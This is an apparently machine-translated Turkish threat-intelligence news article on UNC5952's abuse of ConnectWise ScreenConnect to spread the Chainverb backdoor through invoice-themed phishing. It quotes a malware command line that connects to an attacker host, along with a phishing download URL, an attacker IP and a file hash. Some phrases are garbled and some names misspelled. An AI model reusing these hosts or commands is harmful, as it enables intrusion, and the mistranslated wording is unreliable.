Siber suçlular, küresel finansal kuruluşları hedefleyen gelişmiş kötü amaçlı yazılım kampanyaları dağıtmak için meşru bir uzaktan izleme ve yönetim (RMM) aracı olan ConnectWise Screenconnect’ten yararlanmalarını yoğunlaştırıyor.
Bu endişe verici eğilim, saldırganlar geleneksel güvenlik kontrollerini atlamak ve tehlikeye atılan sistemlere kalıcı uzaktan erişim sağlamak için dijital olarak imzalanmış meşru yazılımlardan yararlandığından, tehdit oyuncusu taktiklerinde önemli bir evrimi temsil eder.
En son saldırı dalgası, fatura temalı kimlik avı e-postalarını birincil teslimat mekanizması olarak kullanır ve kurumsal ortamlarda finansal iletişimin yaygınlığından yararlanır.
.png
)
Bu kampanyalar, gizli operasyonları korumak için dijital sertifikalar içine komut ve kontrol altyapısını yerleştiren özel bir indirici olan Chainverb Backdoor’u dağıtırken, ConnectWise’dan kaçınan tespitten kaçınan meşru dijital imzaları kullanarak dikkate değer bir karmaşıklık göstermektedir.
.webp)
Siber geçirmez analistler, Mayıs 2025 boyunca kötü amaçlı screnconnect damlalarında bir artış, özellikle sosyal olarak tasarlanmış finansal işlem operasyonları yürüttüğü bilinen finansal olarak motive olmuş bir tehdit grubu olan UNC5952’ye atfedilen kampanyalara odaklandı.
Araştırmacılar, birden fazla Ecrime kampanyasında .top ve dns.net üst düzey alanların kullanımında endişe verici bir artış kaydetti ve bu da tehdit aktör altyapı tercihlerinde koordineli bir değişimi gösterdi.
Keşif, ConnectWise’ın 28 Mayıs 2025 Güvenlik Danışmanlığı ile çakışıyor ve şu anda Mantiant tarafından soruşturma altında olan bir ulus-devlet tehdit grubunun potansiyel bir ihlalini kabul ediyor.
Bu gelişme, tehdit ortamına karmaşıklık katmanları ekliyor, çünkü kuruluşlar artık hem finansal olarak motive edilmiş siber suçlular hem de kötü niyetli amaçlar için aynı meşru araçlardan yararlanan sofistike devlet destekli aktörlerle mücadele etmelidir.
RMM araçlarının yaygın olarak kötüye kullanılması, bu uygulamalar, tehlikeye girdikten sonra saldırganlara kapsamlı sistem kontrolü sağlayan doğal uzaktan erişim özelliklerine sahip olduğundan, geleneksel güvenlik paradigmalarına meydan okumaya devam etmektedir.
Sektörlerdeki kuruluşlar, kötü niyetli aktörler tarafından sömürülmelerini önlerken, meşru uzaktan erişim araçları aracılığıyla operasyonel verimliliği sürdürmenin ikili zorluğuyla boğuşuyorlar.
Teknik enfeksiyon mekanizması ve yük dağıtım
Chainverb kötü amaçlı yazılım, komuta ve kontrol iletişimine benzersiz yaklaşımıyla sofistike kaçaklama tekniklerini gösterir.
Yürütme üzerine, kötü amaçlı yazılım, yakalanan komut satırı tarafından kanıtlandığı gibi, dijital sertifika yapıları içinde gizlenmiş gömülü URL’leri kullanarak bağlantılar kurar: "ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kasin22.anondns.net&p=8041&s=d90196cb-dfc3-4979-ae46-cf52dc818d2a".
Bu teknik, kötü amaçlı yazılımın, saldırgan kontrollü sunucularla gizli iletişim kanallarını korurken meşru sertifika altyapısından yararlanmasını sağlar.
.webp)
Enfeksiyon zinciri, kötü niyetli PDF ekleri veya gönderenden gözlemlenen durum gibi doğrudan indirme bağlantıları içeren kimlik avı e -postaları ile başlar ”[email protected]”Kurbanları yönlendirmek https://visionary-clafoutis-308e89.netlify.app/ “Document.exe” i indirmek için.
İndirilen yürütülebilir, meşru bir Adobe okuyucu yükleyicisi olarak görünmesine rağmen, saldırganların kötü niyetli amaçlar için meşru kod izleme sertifikalarını kötüye kullanma yeteneğini gösteren geçerli bir Connectwise Dijital İmza (MD5: A01A80D8C1F665EDA5A81391A1ED0024) taşır.
Kurulduktan sonra, kötü amaçlı yazılım, saldırgan altyapısına uzak masaüstü oturumlarını başlatarak kapsamlı ev sahibi keşif ve ekran görüntüsü yakalama özelliklerini mümkün kılar.
Not Not Port 8880’de 176.123.10.175 gibi IP adreslerine gözlenen bağlantılar, veri açığa çıkmasını ve kalıcı uzaktan erişimi kolaylaştırarak tehdit aktörlerinin uzlaştırılmış ortamlarda genişletilmiş keşif operasyonları gerçekleştirmesine izin verir.
Tehdit istihbarat aramasıyla tehdit araştırmalarını hızlandırın ve zenginleştirin! -> 50 Deneme Arama İsteği